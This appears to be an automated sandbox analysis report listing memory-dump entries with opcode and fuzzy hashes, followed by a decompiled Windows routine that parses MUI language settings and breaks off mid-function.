                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                                                                        • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                                                                                                        • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                                                                        • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                                                                        • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                                                                                                        • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                                                                        • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                                                                        • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                                                                                                        • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                                                                        • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                                                                        • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                                                                                                                        • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                                                                        • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                                                                        • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                                                                                                                        • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                                                                        • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                                                                        • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                                                                                                                        • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                                                                        • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                        • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                        • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                        • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                        • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                                                                                        • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                        • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                        • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                                                                                        • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                        • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                        • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                                                                        • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                        • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                        • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                                                                                        • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                        • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                        			E008E8788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				short* _v12;
                                                                                                                                                        				void* _v16;
                                                                                                                                                        				signed int _v20;
                                                                                                                                                        				char _v24;
                                                                                                                                                        				signed int _v28;
                                                                                                                                                        				signed int _v32;
                                                                                                                                                        				char _v36;
                                                                                                                                                        				signed int _v40;
                                                                                                                                                        				char _v44;
                                                                                                                                                        				signed int _v48;
                                                                                                                                                        				signed int _v52;
                                                                                                                                                        				signed int _v56;
                                                                                                                                                        				signed int _v60;
                                                                                                                                                        				char _v68;
                                                                                                                                                        				void* _t216;
                                                                                                                                                        				intOrPtr _t231;
                                                                                                                                                        				short* _t235;
                                                                                                                                                        				intOrPtr _t257;
                                                                                                                                                        				short* _t261;
                                                                                                                                                        				intOrPtr _t284;
                                                                                                                                                        				intOrPtr _t288;
                                                                                                                                                        				void* _t314;
                                                                                                                                                        				signed int _t318;
                                                                                                                                                        				short* _t319;
                                                                                                                                                        				intOrPtr _t321;
                                                                                                                                                        				void* _t328;
                                                                                                                                                        				void* _t329;
                                                                                                                                                        				char* _t332;
                                                                                                                                                        				signed int _t333;
                                                                                                                                                        				signed int* _t334;
                                                                                                                                                        				void* _t335;
                                                                                                                                                        				void* _t338;
                                                                                                                                                        				void* _t339;
                                                                                                                                                        
                                                                                                                                                        				_t328 = __edx;
                                                                                                                                                        				_t322 = __ecx;
                                                                                                                                                        				_t318 = 0;
                                                                                                                                                        				_t334 = _a4;
                                                                                                                                                        				_v8 = 0;
                                                                                                                                                        				_v28 = 0;
                                                                                                                                                        				_v48 = 0;
                                                                                                                                                        				_v20 = 0;
                                                                                                                                                        				_v40 = 0;
                                                                                                                                                        				_v32 = 0;
                                                                                                                                                        				_v52 = 0;
                                                                                                                                                        				if(_t334 == 0) {
                                                                                                                                                        					_t329 = 0xc000000d;
                                                                                                                                                        					L49:
                                                                                                                                                        					_t334[0x11] = _v56;
                                                                                                                                                        					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                        					_t334[0x12] = _v60;
                                                                                                                                                        					_t334[0x13] = _v28;
                                                                                                                                                        					_t334[0x17] = _v20;
                                                                                                                                                        					_t334[0x16] = _v48;
                                                                                                                                                        					_t334[0x18] = _v40;
                                                                                                                                                        					_t334[0x14] = _v32;
                                                                                                                                                        					_t334[0x15] = _v52;
                                                                                                                                                        					return _t329;
                                                                                                                                                        				}
                                                                                                                                                        				_v56 = 0;
                                                                                                                                                        				if(E008E8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                        					_v56 = 1;
                                                                                                                                                        					if(_v8 != 0) {
                                                                                                                                                        						_t207 = E008CE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                        					}
                                                                                                                                                        					_push(1);
                                                                                                                                                        					_v8 = _t318;
                                                                                                                                                        					E008E718A(_t207);
                                                                                                                                                        					_t335 = _t335 + 4;
                                                                                                                                                        				}
                                                                                                                                                        				_v60 = _v60 | 0xffffffff;
                                                                                                                                                        				if(E008E8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                        					_t333 =  *_v8;
                                                                                                                                                        					_v60 = _t333;
                                                                                                                                                        					_t314 = E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                        					_push(_t333);
                                                                                                                                                        					_v8 = _t318;
                                                                                                                                                        					E008E718A(_t314);
                                                                                                                                                        					_t335 = _t335 + 4;
                                                                                                                                                        				}
                                                                                                                                                        				_t216 = E008E8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                        				_t332 = ";";
                                                                                                                                                        				if(_t216 < 0) {
                                                                                                                                                        					L17:
                                                                                                                                                        					if(E008E8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                        						L30:
                                                                                                                                                        						if(E008E8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                        							L46:
                                                                                                                                                        							_t329 = 0;
                                                                                                                                                        							L47:
                                                                                                                                                        							if(_v8 != _t318) {
                                                                                                                                                        								E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                        							}
                                                                                                                                                        							if(_v28 != _t318) {
                                                                                                                                                        								if(_v20 != _t318) {
                                                                                                                                                        									E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                        									_v20 = _t318;
                                                                                                                                                        									_v40 = _t318;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        							goto L49;
                                                                                                                                                        						}
                                                                                                                                                        						_t231 = _v24;
                                                                                                                                                        						_t322 = _t231 + 4;
                                                                                                                                                        						_push(_t231);
                                                                                                                                                        						_v52 = _t322;
                                                                                                                                                        						E008E718A(_t231);
                                                                                                                                                        						if(_t322 == _t318) {
                                                                                                                                                        							_v32 = _t318;
                                                                                                                                                        						} else {
                                                                                                                                                        							_v32 = E008CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                        						}
                                                                                                                                                        						if(_v32 == _t318) {
                                                                                                                                                        							_v52 = _t318;
                                                                                                                                                        							L58:
                                                                                                                                                        							_t329 = 0xc0000017;
                                                                                                                                                        							goto L47;
                                                                                                                                                        						} else {
                                                                                                                                                        							E008C2340(_v32, _v8, _v24);
                                                                                                                                                        							_v16 = _v32;
                                                                                                                                                        							_a4 = _t318;
                                                                                                                                                        							_t235 = E008DE679(_v32, _t332);
                                                                                                                                                        							while(1) {
                                                                                                                                                        								_t319 = _t235;
                                                                                                                                                        								if(_t319 == 0) {
                                                                                                                                                        									break;
                                                                                                                                                        								}
                                                                                                                                                        								 *_t319 = 0;
                                                                                                                                                        								_t321 = _t319 + 2;
                                                                                                                                                        								E008CE2A8(_t322,  &_v68, _v16);
                                                                                                                                                        								if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        									_a4 = _a4 + 1;
                                                                                                                                                        								}
                                                                                                                                                        								_v16 = _t321;
                                                                                                                                                        								_t235 = E008DE679(_t321, _t332);
                                                                                                                                                        								_pop(_t322);
                                                                                                                                                        							}
                                                                                                                                                        							_t236 = _v16;
                                                                                                                                                        							if( *_v16 != _t319) {
                                                                                                                                                        								E008CE2A8(_t322,  &_v68, _t236);
                                                                                                                                                        								if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        									_a4 = _a4 + 1;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        							if(_a4 == 0) {
                                                                                                                                                        								E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                        								_v52 = _v52 & 0x00000000;
                                                                                                                                                        								_v32 = _v32 & 0x00000000;
                                                                                                                                                        							}
                                                                                                                                                        							if(_v8 != 0) {
                                                                                                                                                        								E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                        							}
                                                                                                                                                        							_v8 = _v8 & 0x00000000;
                                                                                                                                                        							_t318 = 0;
                                                                                                                                                        							goto L46;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_t257 = _v24;
                                                                                                                                                        					_t322 = _t257 + 4;
                                                                                                                                                        					_push(_t257);
                                                                                                                                                        					_v40 = _t322;
                                                                                                                                                        					E008E718A(_t257);
                                                                                                                                                        					_t338 = _t335 + 4;
                                                                                                                                                        					if(_t322 == _t318) {
                                                                                                                                                        						_v20 = _t318;
                                                                                                                                                        					} else {
                                                                                                                                                        						_v20 = E008CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                        					}
                                                                                                                                                        					if(_v20 == _t318) {
                                                                                                                                                        						_v40 = _t318;
                                                                                                                                                        						goto L58;
                                                                                                                                                        					} else {
                                                                                                                                                        						E008C2340(_v20, _v8, _v24);
                                                                                                                                                        						_v16 = _v20;
                                                                                                                                                        						_a4 = _t318;
                                                                                                                                                        						_t261 = E008DE679(_v20, _t332);
                                                                                                                                                        						_t335 = _t338 + 0x14;
                                                                                                                                                        						while(1) {
                                                                                                                                                        							_v12 = _t261;
                                                                                                                                                        							if(_t261 == _t318) {
                                                                                                                                                        								break;
                                                                                                                                                        							}
                                                                                                                                                        							_v12 = _v12 + 2;
                                                                                                                                                        							 *_v12 = 0;
                                                                                                                                                        							E008CE2A8(_v12,  &_v68, _v16);
                                                                                                                                                        							if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        								_a4 = _a4 + 1;
                                                                                                                                                        							}
                                                                                                                                                        							_v16 = _v12;
